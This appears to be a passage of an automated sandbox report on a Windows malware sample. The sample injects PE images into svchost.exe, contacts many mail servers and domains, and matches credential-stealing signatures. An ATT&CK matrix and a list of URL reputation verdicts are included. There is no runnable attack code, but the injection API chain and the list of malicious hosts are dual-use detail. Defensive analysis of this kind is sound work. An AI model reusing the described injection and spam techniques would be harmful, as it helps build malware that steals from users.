                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.154.163.204 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.146.154 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.31 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.119.154.66 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messagingengine.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mijash3.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: araax.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.235.175 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.72.4.226 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: plaske.ua
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: indonesiamedia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.134.13.210 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pcoyuncu.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: vvsteknik.dk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.27 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 156.251.140.23 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.4.56.54 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.96.7 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.68.180 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.181.161.11 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludea.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: esmoke.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: simetar.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: gcss.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.26 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.8.8.200 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.220 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: magicomm.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nolaoig.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.64.147.213 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mkm-gr.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: dyag-eng.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hchc.org
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.204.56 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.224 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.7 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ascc.org.au
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.196.145 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.195.12.38 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.164.242 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.231.13.148 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.mail.yahoo.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: insia.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.172.28.89 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: wantapc.net
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.200.51.73 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.15.12.103 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: fogra.com.pl
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 25
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 25Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.55.51 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettle.pl
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.33.252 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.31.76.90 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.compuserve.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: top1oil.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: kumaden.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.77.146 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: daytonir.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.42.105.162 80Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: banvari.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: nels.co.uk
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbaben.com
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: likangds.com
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.69.141.67 25
                  Source: C:\Windows\SysWOW64\svchost.exeDomain query: h-et-l.com
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7F0D0000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001F80 GetEnvironmentVariableA,lstrcat,lstrcat,lstrcat,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,6_2_04001F80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,6_2_04001DC0
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118E0BE cpuid 1_2_0118E0BE
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\PIyT9A3jfC.exeCode function: 1_2_0118E562 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_0118E562

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.PIyT9A3jfC.exe.1330000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.f20000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.PIyT9A3jfC.exe.1330000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.pigalicapi.exe.f20000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.pigalicapi.exe.6a0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.svchost.exe.4000000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.815888056.0000000000F20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.817368079.0000000001330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.815888334.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts1
                  Native API
                  1
                  Registry Run Keys / Startup Folder
                  411
                  Process Injection
                  111
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium11
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Registry Run Keys / Startup Folder
                  21
                  Virtualization/Sandbox Evasion
                  LSASS Memory121
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)411
                  Process Injection
                  Security Account Manager1
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                  Non-Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Obfuscated Files or Information
                  NTDS21
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput CaptureScheduled Transfer25
                  Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets1
                  Remote System Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync23
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1281447 Sample: PIyT9A3jfC Startdate: 27/07/2023 Architecture: WINDOWS Score: 100 53 lyto.net 2->53 55 vivastay.com 2->55 57 235 other IPs or domains 2->57 97 Snort IDS alert for network traffic 2->97 99 Antivirus detection for URL or domain 2->99 101 Multi AV Scanner detection for submitted file 2->101 107 3 other signatures 2->107 8 pigalicapi.exe 48 2->8         started        12 PIyT9A3jfC.exe 3 68 2->12         started        15 pigalicapi.exe 48 2->15         started        signatures3 103 System process connects to network (likely due to code injection or exploit) 53->103 105 Tries to resolve many domain names, but no domain seems valid 55->105 process4 dnsIp5 59 www.wnsavoy.com 8->59 67 143 other IPs or domains 8->67 109 Multi AV Scanner detection for dropped file 8->109 111 Machine Learning detection for dropped file 8->111 17 svchost.exe 8->17         started        61 www.reglera.com 12->61 69 198 other IPs or domains 12->69 37 C:\Users\user\pigalicapi.exe, PE32 12->37 dropped 39 C:\Users\...\pigalicapi.exe:Zone.Identifier, ASCII 12->39 dropped 113 Detected unpacking (creates a PE file in dynamic memory) 12->113 115 Drops PE files to the user root directory 12->115 21 svchost.exe 12->21         started        23 svchost.exe 12->23         started        63 www.jroy.net 15->63 65 www.jacomfg.com 15->65 71 138 other IPs or domains 15->71 25 svchost.exe 15->25         started        file6 117 System process connects to network (likely due to code injection or exploit) 61->117 119 Tries to resolve many domain names, but no domain seems valid 65->119 signatures7 process8 dnsIp9 41 smtp.mail.global.gm0.yahoodns.net 87.248.97.36, 25, 50217 YAHOO-IRDGB United Kingdom 17->41 43 185.205.70.128, 25, 50153 DEVINOTELECOM-ASRU unknown 17->43 49 6 other IPs or domains 17->49 87 System process connects to network (likely due to code injection or exploit) 17->87 89 Injects a PE file into a foreign processes 17->89 27 svchost.exe 11 17->27         started        31 svchost.exe 1 12 17->31         started        33 svchost.exe 17->33         started        35 svchost.exe 17->35         started        91 Contains functionality to inject threads in other processes 21->91 93 Contains functionality to inject code into remote processes 21->93 45 gmail-smtp-in.l.google.com 25->45 47 87.248.97.31, 25, 50060 YAHOO-IRDGB United Kingdom 25->47 51 8 other IPs or domains 25->51 signatures10 95 Tries to resolve many domain names, but no domain seems valid 45->95 process11 dnsIp12 73 zupraha.cz 27->73 79 67 other IPs or domains 27->79 121 System process connects to network (likely due to code injection or exploit) 27->121 81 25 other IPs or domains 31->81 75 tcpoa.com 33->75 77 sanfotek.net 33->77 83 32 other IPs or domains 33->83 85 26 other IPs or domains 35->85 signatures13

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PIyT9A3jfC.exe26%ReversingLabs
                  PIyT9A3jfC.exe35%VirustotalBrowse
                  PIyT9A3jfC.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
                  C:\Users\user\pigalicapi.exe26%ReversingLabs
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  impexnc.com0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://ww25.railbook.net/?subid1=20230728-0544-185e-b7f5-be2d330da0b20%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/js/form.class.js0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-600x338.jpg0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/fonts/DejaVu-Sans/stylesheet.css0%Avira URL Cloudsafe
                  http://www.gpthink.com/c1100%Avira URL Cloudmalware
                  http://www.alteor.cl/aVX0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/0%Avira URL Cloudsafe
                  http://www.naoi-a.comm0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik0%Avira URL Cloudsafe
                  https://www.medius.si/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.00%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                  https://www.stajerskagz.si/o-sgz-2/0%Avira URL Cloudsafe
                  https://pohlfood.com/#website0%Avira URL Cloudsafe
                  https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                  https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg0%Avira URL Cloudsafe
                  http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.500%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2023/06/Untitled-design-64x36.jpg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev0%Avira URL Cloudsafe
                  http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/0%Avira URL Cloudsafe
                  http://gpthink.com/product/204.html100%Avira URL Cloudmalware
                  http://pohlfood.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.14.10%Avira URL Cloudsafe
                  http://likangds.com/0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-600x599.jpg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/0%Avira URL Cloudsafe
                  http://www.elpro.si/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/0%Avira URL Cloudsafe
                  http://www.pb-games.co/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.0%Avira URL Cloudsafe
                  https://www.pwd.org/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/0%Avira URL Cloudsafe
                  http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                  http://wwwomes.edu.pl/0%Avira URL Cloudsafe
                  https://www.elpro.si/avtorji/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/sitepreY0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/0%Avira URL Cloudsafe
                  http://www.credo.edu.pl/100%Avira URL Cloudmalware
                  http://sigtoa.com/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/0%Avira URL Cloudsafe
                  http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver0%Avira URL Cloudsafe
                  http://hotel-amadeus-frankfurt.de/uploads/pictures/resized/20130104085305_100_0645_105x0-aspect-wr.J0%Avira URL Cloudsafe
                  https://www.elpro.si/wp-content/uploads/2022/10/akcija-5-of-25-Copy-100x100.jpg0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji0%Avira URL Cloudsafe
                  https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/0%Avira URL Cloudsafe
                  https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni0%Avira URL Cloudsafe
                  https://www.aevga.com/100%Avira URL Cloudmalware
                  https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/0%Avira URL Cloudsafe
